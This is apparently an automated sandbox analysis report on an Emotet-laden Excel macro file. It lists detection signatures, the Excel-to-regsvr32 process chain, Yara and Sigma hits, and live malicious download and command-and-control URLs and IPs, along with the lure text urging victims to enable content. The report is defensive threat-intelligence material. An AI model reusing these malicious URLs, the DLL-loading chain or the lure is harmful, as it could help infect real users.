Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
qd_34768.xlsm

Overview

General Information

Sample Name:qd_34768.xlsm
Analysis ID:601134
MD5:07f30f1fa5420f050ea5929af0f95265
SHA1:6310b51fca4003fb36252367f058c2e990ba5734
SHA256:48f3ef54ff2ed0b44d5e4836c56a3a8f3214d7214278172ef84166f6d42cc067
Tags:xlsm
Infos:

Detection

Hidden Macro 4.0 Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Network Activity
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Regsvr32 Command Line Without DLL
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected MalDoc1
Queries the volume information (name, serial number etc) of a device
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sigma detected: Excel Network Connections
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Yara detected Xls With Macro 4.0
Potential key logger detected (key state polling based)
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Drops PE files to the user directory
Excel documents contains an embedded macro which executes code when the document is opened
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 1528 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 468 cmdline: C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll MD5: 432BE6CF7311062633459EEF6B242FB5)
      • regsvr32.exe (PID: 2140 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd" MD5: 432BE6CF7311062633459EEF6B242FB5)
        • regsvr32.exe (PID: 732 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Yyhjz\waeusmddlxyznd.sfn" MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sharedStrings.xmlJoeSecurity_MalDoc_1Yara detected MalDoc_1Joe Security
    app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security
      SourceRuleDescriptionAuthorStrings
      00000004.00000002.470295129.0000000000231000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000004.00000002.470295129.0000000000231000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000005.00000002.735740378.0000000000250000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            00000005.00000002.735740378.0000000000250000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
                Click to see the 7 entries
                SourceRuleDescriptionAuthorStrings
                5.2.regsvr32.exe.250000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  5.2.regsvr32.exe.250000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    4.2.regsvr32.exe.180000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      4.2.regsvr32.exe.180000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                        5.2.regsvr32.exe.250000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                          Click to see the 13 entries

                          System Summary

                          barindex
                          Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll, CommandLine: C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1528, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll, ProcessId: 468, ProcessName: regsvr32.exe
                          Source: Network ConnectionAuthor: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 68.183.94.239, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\regsvr32.exe, Initiated: true, ProcessId: 732, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49166
                          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd", CommandLine: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 468, ParentProcessName: regsvr32.exe, ProcessCommandLine: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd", ProcessId: 2140, ProcessName: regsvr32.exe
                          Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0": Data: DestinationIp: 185.46.40.47, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1528, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: qd_34768.xlsmReversingLabs: Detection: 40%
                          Source: http://eles-tech.com/css/KzMysMqFMs/Avira URL Cloud: Label: malware
                          Source: https://68.183.94.239:80/DiyTlQGJuLlFIgtBpxSntEnJrcPFhzwChyUaMhMLcrifUxIxXlgWcSSxyKnurarAvira URL Cloud: Label: malware
                          Source: https://68.183.94.239/Avira URL Cloud: Label: malware
                          Source: https://68.183.94.239:80/DiyTlQGJuLlFIgtBpxSntEnJrcPFhzwChyUaMhMLcrifUxIxXlgWcSSxyKnuralAvira URL Cloud: Label: malware
                          Source: eles-tech.comVirustotal: Detection: 9%Perma Link
                          Source: http://eles-tech.com/css/KzMysMqFMs/Virustotal: Detection: 10%Perma Link
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100492F7 FindFirstFileA,FindClose,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100489BD __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_004168D2 FindFirstFileW,

                          Software Vulnerabilities

                          barindex
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: eVzUZ7dv5zBAXa5[1].dll.0.drJump to dropped file
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eVzUZ7dv5zBAXa5[1].dllJump to behavior
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\xewn.dllJump to behavior
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
                          Source: global trafficDNS query: name: eles-tech.com
                          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.46.40.47:80
                          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.46.40.47:80

                          Networking

                          barindex
                          Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 68.183.94.239 80
                          Source: Yara matchFile source: sharedStrings.xml, type: SAMPLE
                          Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
                          Source: Joe Sandbox ViewASN Name: TELLCOM-ASTR TELLCOM-ASTR
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 31 Mar 2022 20:52:02 GMTServer: ApacheCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Thu, 31 Mar 2022 20:52:02 GMTContent-Disposition: attachment; filename="eVzUZ7dv5zBAXa5.dll"Content-Transfer-Encoding: binarySet-Cookie: 6246147296b82=1648759922; expires=Thu, 31-Mar-2022 20:53:02 GMT; Max-Age=60; path=/Last-Modified: Thu, 31 Mar 2022 20:52:02 GMTContent-Length: 868352Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 19 fc 6d bc 5d 9d 03 ef 5d 9d 03 ef 5d 9d 03 ef 0b 82 10 ef 78 9d 03 ef 5d 9d 03 ef 65 9d 03 ef 3f 82 10 ef 4e 9d 03 ef 5d 9d 02 ef 88 9c 03 ef de 81 0d ef 46 9d 03 ef b5 82 09 ef d6 9d 03 ef e5 9b 05 ef 5c 9d 03 ef b5 82 08 ef df 9d 03 ef b5 82 07 ef 5c 9d 03 ef 52 69 63 68 5d 9d 03 ef 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 a7 31 46 62 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 06 00 00 90 07 00 00 f0 05 00 00 00 00 00 10 a9 01 00 00 10 00 00 00 a0 07 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 0d 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 d5 08 00 ae 01 00 00 00 80 09 00 04 01 00 00 00 c0 09 00 33 34 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 5c 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 8c 09 00 a0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7e 8e 07 00 00 10 00 00 00 90 07 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4e 37 01 00 00 a0 07 00 00 40 01 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 28 98 00 00 00 e0 08 00 00 50 00 00 00 e0 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 e5 3c 00 00 00 80 09 00 00 40 00 00 00 30 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 33 34 03 00 00 c0 09 00 00 40 03 00 00 70 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 47 89 00 00 00 00 0d 00 00 90 00 00 00 b0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@
                          Source: global trafficHTTP traffic detected: GET /css/KzMysMqFMs/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: eles-tech.comConnection: Keep-Alive
                          Source: unknownTCP traffic detected without corresponding DNS query: 68.183.94.239
                          Source: unknownTCP traffic detected without corresponding DNS query: 68.183.94.239
                          Source: unknownTCP traffic detected without corresponding DNS query: 68.183.94.239
                          Source: unknownTCP traffic detected without corresponding DNS query: 68.183.94.239
                          Source: unknownTCP traffic detected without corresponding DNS query: 68.183.94.239
                          Source: unknownTCP traffic detected without corresponding DNS query: 68.183.94.239
                          Source: unknownTCP traffic detected without corresponding DNS query: 68.183.94.239
                          Source: unknownTCP traffic detected without corresponding DNS query: 68.183.94.239
                          Source: unknownTCP traffic detected without corresponding DNS query: 68.183.94.239
                          Source: unknownTCP traffic detected without corresponding DNS query: 68.183.94.239
                          Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                          Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                          Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                          Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                          Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                          Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                          Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                          Source: regsvr32.exe, 00000005.00000002.735823282.0000000000311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                          Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.5.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                          Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                          Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                          Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                          Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                          Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                          Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                          Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                          Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                          Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                          Source: regsvr32.exe, 00000005.00000002.735823282.0000000000311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://68.183.94.239/
                          Source: regsvr32.exe, 00000005.00000002.735823282.0000000000311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://68.183.94.239:80/DiyTlQGJuLlFIgtBpxSntEnJrcPFhzwChyUaMhMLcrifUxIxXlgWcSSxyKnural
                          Source: regsvr32.exe, 00000005.00000002.735823282.0000000000311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://68.183.94.239:80/DiyTlQGJuLlFIgtBpxSntEnJrcPFhzwChyUaMhMLcrifUxIxXlgWcSSxyKnurar
                          Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F230AC8.jpgJump to behavior
                          Source: unknownDNS traffic detected: queries for: eles-tech.com
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00405D75 InternetReadFile,
                          Source: global trafficHTTP traffic detected: GET /css/KzMysMqFMs/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: eles-tech.comConnection: Keep-Alive
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1003BD55 __EH_prolog,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,SendMessageA,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10044296 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1004697A GetKeyState,GetKeyState,GetKeyState,GetKeyState,

                          E-Banking Fraud

                          barindex
                          Source: Yara matchFile source: 5.2.regsvr32.exe.250000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.regsvr32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.regsvr32.exe.250000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.regsvr32.exe.230000.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.regsvr32.exe.400000.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.regsvr32.exe.180000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.regsvr32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.regsvr32.exe.3c0000.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.regsvr32.exe.1e0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000004.00000002.470295129.0000000000231000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.735740378.0000000000250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000002.469991014.0000000000180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.464483054.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                          System Summary

                          barindex
                          Source: Screenshot number: 4Screenshot OCR: Enable Editing and click Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
                          Source: Screenshot number: 4Screenshot OCR: Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
                          Source: Screenshot number: 8Screenshot OCR: Enable Editing and click Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ::
                          Source: Screenshot number: 8Screenshot OCR: Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 :: -Aj 19 20 21 22 23
                          Source: qd_34768.xlsmMacro extractor: Sheet: PIMKE contains: URLDownloadToFileA
                          Source: qd_34768.xlsmMacro extractor: Sheet: PIMKE contains: URLDownloadToFileA
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eVzUZ7dv5zBAXa5[1].dllJump to dropped file
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\xewn.dllJump to dropped file
                          Source: qd_34768.xlsmInitial sample: EXEC
                          Source: qd_34768.xlsmInitial sample: EXEC
                          Source: C:\Windows\SysWOW64\regsvr32.exeFile created: C:\Windows\SysWOW64\Onodwrlgmyciiaw\Jump to behavior
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1002D9F0
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10027A87
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10017A8D
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10017C6A
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100203BE
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10042F7D
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003C25E7
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003DE978
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003D8BA1
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003C8ED3
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003CB1A1
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003D31D5
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003D39B8
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003D7A53
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003DFADC
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003C5AC9
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003CDF44
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003C3F40
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003DC064
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003C2050
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003D609A
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003D815D
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003CC14C
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003DA1B1
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003C62BA
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003DE2E1
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003CC388
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003DA455
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003D44A7
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003C4497
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003CE4E2
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003DE4E3
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003D0552
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003DC5E5
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003DE63C
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003D2606
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003E06E7
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003D46DD
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003D86C1
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003CC7B4
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003E0887
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003D4930
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003C4949
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003C89F6
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003DA9EE
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003D0A27
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003E0A1E
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003CEA8C
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003D6B98
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003D0B84
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003CEC5D
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003D2CAC
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003C4D13
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003C4E03
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003C2E8C
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003D8EF4
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003DEECF
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003C6F64
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003CAF67
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003DAFB1
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003D0F87
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003CD0F7
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003DB1BA
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003C51B7
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003D51F0
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003C323D
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003D92F0
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003C7336
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003C53F6
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003C9400
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003DF571
